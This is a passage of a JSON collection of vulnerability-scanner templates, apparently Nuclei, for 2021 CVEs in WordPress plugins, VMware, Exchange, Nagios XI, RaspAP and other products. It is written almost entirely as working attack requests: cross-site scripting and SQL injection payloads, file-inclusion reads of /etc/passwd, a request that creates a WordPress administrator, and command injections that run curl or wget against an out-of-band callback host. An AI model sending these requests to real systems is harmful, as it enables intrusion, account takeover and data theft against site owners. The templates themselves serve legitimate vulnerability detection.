Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-40908","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code 